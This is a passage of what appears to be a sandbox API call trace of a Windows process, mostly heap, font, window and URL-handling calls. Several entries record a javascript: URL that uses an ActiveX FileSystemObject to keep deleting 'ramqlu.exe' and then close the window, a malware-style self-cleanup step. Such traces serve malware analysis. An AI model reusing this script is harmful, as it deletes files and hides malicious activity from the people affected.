lpList=0x2cf3a0) returned 1 [0075.856] GetSystemMetrics (nIndex=4096) returned 0 [0075.856] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0075.856] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0075.856] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0075.856] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0075.856] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0075.856] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0075.856] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0075.856] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2c) returned 0x45c2a0 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44faf8 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x64) returned 0x473780 [0075.856] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x453948 [0076.604] SetTimer (hWnd=0x202a8, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.604] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.604] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf50c, dwFlags=0x0 | out: pdwZone=0x2cf50c*=0xffffffff) returned 0x800c0011 [0076.604] CoInternetIsFeatureEnabled 
(FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0076.604] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0076.604] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0076.604] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x2106, pPolicy=0x2cf510, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x2cf510*=0x0) returned 0x0 [0076.604] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44fb50 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb50 | out: hHeap=0x410000) returned 1 [0076.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x47a1e0 [0076.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.606] RedrawWindow (hWnd=0x202a8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0076.606] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a588 | out: hHeap=0x410000) returned 1 [0076.606] GetCurrentThreadId () returned 0x90 [0076.606] GetCurrentThreadId () returned 0x90 
[0076.606] GetCurrentThreadId () returned 0x90 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x47a588 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64) returned 0x4737f0 [0076.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x47a970 [0076.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xdc) returned 0x46be68 [0076.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c268 [0076.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x250) returned 0x47aa68 [0076.609] LsGetRubyLsimethods () returned 0x0 [0076.609] LsGetTatenakayokoLsimethods () returned 0x0 [0076.609] LsGetHihLsimethods () returned 0x0 [0076.609] LsGetWarichuLsimethods () returned 0x0 [0076.609] LsGetReverseLsimethods () returned 0x0 [0076.609] LsCreateContext () returned 0x0 [0076.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x670) returned 0x47acc0 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x453978 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x468910 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x4539a8 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2e4) returned 0x47b338 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x46c678 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472190 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x47b628 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f380 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4721b8 [0076.610] RtlAllocateHeap 
(HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4721e0 [0076.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472208 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472230 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x400) returned 0x47b6d0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613c0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613d0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613e0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613f0 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x47bad8 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x47bc08 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x47bd30 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x130) returned 0x47be40 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x468a28 [0076.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x278) returned 0x47bf78 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x47c1f8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x190) returned 0x47c2c8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x78) returned 0x422038 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x47c460 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x44fb50 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x194) returned 0x47c558 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc8) returned 0x47c6f8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x190) returned 0x47c7c8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 
Size=0x108) returned 0x47c960 [0076.612] LsSetModWidthPairs () returned 0x0 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x240) returned 0x47ca70 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fde8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472258 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x47a5a0 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2e0) returned 0x47ccb8 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x4539d8 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x47cfa0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x47d068 [0076.614] LsSetBreaking () returned 0x0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x271) returned 0x47d130 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x47a5b8 [0076.614] LsSetDoc () returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613c0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613d0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613e0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613f0, reserved=0x47ae6c) returned 0x0 [0076.614] LsCreateLine () returned 0x0 [0076.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47d3b0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf8) returned 0x47d470 [0076.615] EnumFontsW (hdc=0x100109d1, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x2ce7fc) returned 1 [0076.616] CreateFontIndirectW (lplf=0x2ce798) returned 0x80a0a6b [0076.616] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.616] 
GetTextMetricsW (in: hdc=0x100109d1, lptm=0x2ce700 | out: lptm=0x2ce700) returned 1 [0076.617] GetOutlineTextMetricsW (in: hdc=0x100109d1, cjCopy=0xd8, potm=0x2ce600 | out: potm=0x2ce600) returned 0xd8 [0076.617] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.617] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.617] GetTextFaceW (in: hdc=0x100109d1, c=32, lpName=0x2ce850 | out: lpName="Times New Roman") returned 16 [0076.617] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetTextCharsetInfo (in: hdc=0x100109d1, lpSig=0x2ce7b8, dwFlags=0x0 | out: lpSig=0x2ce7b8) returned 0 [0076.618] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x47a5d0 [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetFontUnicodeRanges (in: hdc=0x100109d1, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0076.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x27c) returned 0x47dc30 [0076.618] GetFontUnicodeRanges (in: hdc=0x100109d1, lpgs=0x47dc30 | out: lpgs=0x47dc30) returned 0x27c [0076.618] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetCharWidth32W (in: hdc=0x100109d1, iFirst=0x20, iLast=0x7e, lpBuffer=0x2ce790 | out: lpBuffer=0x2ce790) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x17c) returned 0x47deb8 [0076.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x800) returned 0x47e040 [0076.621] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47e848 [0076.622] RtlAllocateHeap 
(HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47e908 [0076.622] LsQueryLineDup () returned 0x0 [0076.622] LsDestroyLine () returned 0x0 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461740 [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f3c8 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ccb8 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf5d4, lprcSrc1=0x2cf5d4, lprcSrc2=0x2cf5a4 | out: lprcDst=0x2cf5d4) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf5c4 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf5e4 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf294, lprcSrc1=0x2cf294, lprcSrc2=0x2cf264 | out: lprcDst=0x2cf294) returned 1 [0076.623] 
IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf284 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf2a4 | out: lprcDst=0x459c28) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf1a8, lprcSrc1=0x2cf1a8, lprcSrc2=0x459c18 | out: lprcDst=0x2cf1a8) returned 1 [0076.623] UnionRect (in: lprcDst=0x2cf4b0, lprcSrc1=0x2cf4b0, lprcSrc2=0x2cf45c | out: lprcDst=0x2cf4b0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf358, lprcSrc1=0x2cf358, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf358) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf3f0, lprcSrc1=0x2cf3f0, lprcSrc2=0x2cf358 | out: lprcDst=0x2cf3f0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf358, lprcSrc1=0x2cf358, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf358) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf3f0, lprcSrc1=0x2cf3f0, lprcSrc2=0x2cf358 | out: lprcDst=0x2cf3f0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.624] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.624] UnionRect (in: lprcDst=0x2cf7f0, lprcSrc1=0x2cf7f0, lprcSrc2=0x2cf79c | out: lprcDst=0x2cf7f0) returned 1 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a08 [0076.624] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 
lpMem=0x453a08 | out: hHeap=0x410000) returned 1 [0076.624] RedrawWindow (hWnd=0x202a8, lprcUpdate=0x2cf870, hrgnUpdate=0x0, flags=0x21) returned 1 [0076.624] GetFocus () returned 0x202a8 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x461400 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x461410 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a08 [0076.624] GetFocus () returned 0x202a8 [0076.624] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.625] GetCapture () returned 0x0 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a38 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a68 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] GetFocus () returned 0x202a8 [0076.626] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.626] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45dbd0, Size=0x6c) returned 0x47ccb8 [0076.627] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.627] GetCapture () returned 0x0 [0076.627] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.627] GetCurrentThreadId () returned 0x90 [0076.627] 
HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.628] GetCapture () returned 0x0 [0076.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] GetCurrentThreadId () returned 0x90 [0076.629] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.629] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x47ccb8, Size=0x9c) returned 0x47ccb8 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a68 | out: hHeap=0x410000) returned 1 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461400 | out: hHeap=0x410000) returned 1 [0076.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a38 | out: hHeap=0x410000) returned 1 [0076.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461410 | 
out: hHeap=0x410000) returned 1 [0076.631] GetCurrentThreadId () returned 0x90 [0076.631] GetFocus () returned 0x202a8 [0076.631] GetFocus () returned 0x202a8 [0076.631] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf868 | out: ppu=0x2cf868) returned 0x0 [0076.631] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.631] IUri:GetAbsoluteUri (in: This=0x43bfcc, pbstrAbsoluteUri=0x2cf8e8 | out: pbstrAbsoluteUri=0x2cf8e8*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0076.631] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.631] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0076.632] ShouldShowIntranetWarningSecband () returned 0x0 [0076.807] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf18c | out: ppv=0x2cf18c*=0x75028d20) returned 0x0 [0076.808] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf278 | out: ppvObject=0x2cf278*=0x75028d2c) returned 0x0 [0076.808] IUnknown:Release (This=0x75028d20) returned 0x1 [0076.808] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x457c78, cchResult=0x8c, pcchResult=0x2cf2c0, dwReserved=0x0 | out: pwzResult="javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cf2c0*=0x8c) returned 0x0 [0076.808] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x47ee08 [0076.808] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ee08 | out: hHeap=0x410000) returned 1 [0076.808] IUnknown:Release (This=0x75028d2c) returned 0x1 [0076.808] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf18c | out: ppv=0x2cf18c*=0x75028d20) returned 0x0 [0076.809] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf278 | out: ppvObject=0x2cf278*=0x75028d2c) returned 0x0 [0076.809] IUnknown:Release (This=0x75028d20) returned 0x1 [0076.809] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x457c78, cchResult=0x8c, pcchResult=0x2cf2d0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf2d0*=0x0) returned 0x800c0011 [0076.809] IUnknown:Release (This=0x75028d2c) returned 0x1 [0076.809] GetIUriPriv () returned 0x0 [0076.809] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.809] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf6e0 | out: lpPoint=0x2cf6e0) returned 1 [0076.809] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) 
returned 1 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] GetFocus () returned 0x202a8 [0076.810] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf850 | out: lpPoint=0x2cf850) returned 1 [0076.810] GetClientRect (in: hWnd=0x202a8, lpRect=0x2cf840 | out: lpRect=0x2cf840) returned 1 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473780 | out: hHeap=0x410000) returned 1 [0076.810] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x47a5e8 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d920 | out: hHeap=0x410000) returned 1 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451598 | out: hHeap=0x410000) returned 1 [0076.810] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, 